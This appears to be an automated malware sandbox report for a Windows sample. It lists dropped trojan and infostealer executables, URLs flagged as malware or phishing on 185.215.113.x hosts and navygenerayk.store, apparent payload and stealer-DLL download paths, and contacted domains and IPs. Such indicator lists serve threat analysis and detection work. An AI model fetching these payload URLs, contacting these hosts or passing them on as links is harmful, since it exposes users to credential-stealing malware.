C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	32%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	32%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://185.215.113.206/68b591d6548ec281/mozglue.dllL	100%	Avira URL Cloud	malware
http://185.215.113.16/off/def.exeed	100%	Avira URL Cloud	phishing
http://185.215.113.206/68b591d6548ec281/softokn3.dllWB	100%	Avira URL Cloud	malware
https://navygenerayk.store/a	100%	Avira URL Cloud	malware
https://navygenerayk.store/c	100%	Avira URL Cloud	malware
http://185.215.113.43/15.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#7	100%	Avira URL Cloud	malware
https://msn.comXIDv10m	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeR	100%	Avira URL Cloud	phishing
https://navygenerayk.store/~	100%	Avira URL Cloud	malware
http://185.215.113.206/Lu~	100%	Avira URL Cloud	malware
https://navygenerayk.store/s	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpo)%	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/freebl3.dllHC	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpzpJS	100%	Avira URL Cloud	malware
http://185.215.113.206g	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/sqlite3.dllzCe	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php/d	100%	Avira URL Cloud	malware
https://navygenerayk.store/8	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php/D%	100%	Avira URL Cloud	malware
http://185.215.113.206S	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.php7	100%	Avira URL Cloud	malware
https://navygenerayk.store/api(	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpB	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpW	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncoded%	100%	Avira URL Cloud	malware
http://185.215.113.16/0	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.php;D	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpR	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpX	100%	Avira URL Cloud	malware
https://navygenerayk.store/apieuf	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php;.	100%	Avira URL Cloud	malware
http://185.215.113.16/Z	100%	Avira URL Cloud	phishing
http://185.215.113.43/Zu7JuNko/index.phpncodedJ	100%	Avira URL Cloud	malware
http://185.215.113.16/luma/random.exe61395d7	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.phpg	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpd	100%	Avira URL Cloud	malware
https://navygenerayk.store/hs	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpi	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpp	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
plus.l.google.com	172.217.16.142	true	false	high
play.google.com	142.250.185.174	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.122	true	false	high
www.google.com	142.250.185.100	true	false	high
googlehosted.l.googleusercontent.com	142.250.186.161	true	false	high
navygenerayk.store	188.114.96.3	true	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
presticitpo.store	unknown	unknown	false	high
founpiuer.store	unknown	unknown	false	high
thumbystriw.store	unknown	unknown	false	high
necklacedmny.store	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high
crisiwarny.store	unknown	unknown	false	high
fadehairucw.store	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/	false	high
https://c.msn.com/c.gif?rnd=1731317601819&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cab479153b874b3da039ff0032aa1e4d&activityId=cab479153b874b3da039ff0032aa1e4d&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=273F2475F82C4386958D625ABD0712E0&MUID=18874E57A98C67C518B55B63A89566FE	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317605190&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
necklacedmny.store	false	high
https://sb.scorecardresearch.com/b?rn=1731317601820&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18874E57A98C67C518B55B63A89566FE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
fadehairucw.store	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://navygenerayk.store/api	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
founpiuer.store	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
crisiwarny.store	false	high
185.215.113.206/c4becf79229cb002.php	false	high
scriptyprefej.store	false	high
https://play.google.com/log?format=json&hasfast=true	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317605396&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.16/mine/random.exe	false	high
presticitpo.store	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dllL	file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	false		high
http://185.215.113.206/68b591d6548ec281/softokn3.dllWB	file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://navygenerayk.store:443/apiK	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/c	167c7bdf2f.exe, 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/def.exeed	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://navygenerayk.store/a	167c7bdf2f.exe, 00000018.00000002.2879651443.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/15.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#7	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeR	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://msn.comXIDv10m	167c7bdf2f.exe, 00000018.00000003.2786165532.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2788660171.00000000054E3000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787761356.00000000054E2000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787796925.0000000005501000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2787718763.00000000054DE000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940341468.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940593754.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2940501775.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180558948.0000000005902000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180954161.00000000058E7000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3180798714.00000000058DF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://navygenerayk.store/~	167c7bdf2f.exe, 00000018.00000003.2812117426.00000000054DC000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811704797.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.206/Lu~	d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store:443/api	167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/ws	skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_498.4.dr	false		high
https://navygenerayk.store/s	167c7bdf2f.exe, 00000021.00000002.3303459395.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpo)%	file.exe, 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpzpJS	167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.php/D%	d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.215.113.206s.exe	file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	false		high
https://navygenerayk.store/C	167c7bdf2f.exe, 00000021.00000003.3236828828.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://navygenerayk.store/	167c7bdf2f.exe, 00000021.00000002.3303459395.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3236828828.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.c	167c7bdf2f.exe, 0000001D.00000003.3036036378.000000000133C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dllHC	file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr	false		high
http://185.215.113.43/G	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php/d	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206g	167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dllzCe	file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/	skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	167c7bdf2f.exe, 00000018.00000003.2799646851.000000000557C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2960948401.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3191654298.0000000005985000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/8	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, HIDAFHDH.0.dr	false		high
http://185.215.113.206S	skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	167c7bdf2f.exe, 00000021.00000003.3193740391.00000000059F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php7	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://plus.google.com	chromecache_498.4.dr	false		high
https://navygenerayk.store/api(	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded%	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpB	d77e539f5f.exe, 00000019.00000002.2826853766.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	file.exe, 00000000.00000003.2328117934.0000000023C01000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php;D	d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/0	167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2435007953.0000000023941000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2811737545.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206s	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/c4becf79229cb002.phpR	skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpW	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpX	d77e539f5f.exe, 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients6.google.com	chromecache_498.4.dr	false		high
https://navygenerayk.store/apieuf	167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php;.	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncodedJ	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpd	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/8	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/Z	167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/c4becf79229cb002.phpg	d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	167c7bdf2f.exe, 0000001D.00000003.2963192513.000000000137D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe61395d7	skotes.exe, 00000017.00000002.3301444059.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/c4becf79229cb002.phpe	d77e539f5f.exe, 00000019.00000002.2826853766.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/C:	167c7bdf2f.exe, 0000001D.00000003.3088908428.0000000005A64000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpi	skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpC	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpD	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/hs	167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2261433912.000000002394C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181545423.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2774343116.0000000005513000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000003.2784782743.0000000005534000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2922391850.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939837978.0000000005A26000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.2939956979.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005934000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3179967488.000000000592C000.00000004.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000003.3166979874.000000000590F000.00000004.00000800.00020000.00000000.sdmp, DBKKFHIE.0.dr, HIDAFHDH.0.dr, Web Data.7.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpp	file.exe, 00000000.00000002.2435007953.00000000239C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/15.113.43/	skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.33.40.138	unknown	United States	20940	AKAMAI-ASN1EU	false
23.33.40.136	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.185.100	www.google.com	United States	15169	GOOGLEUS	false
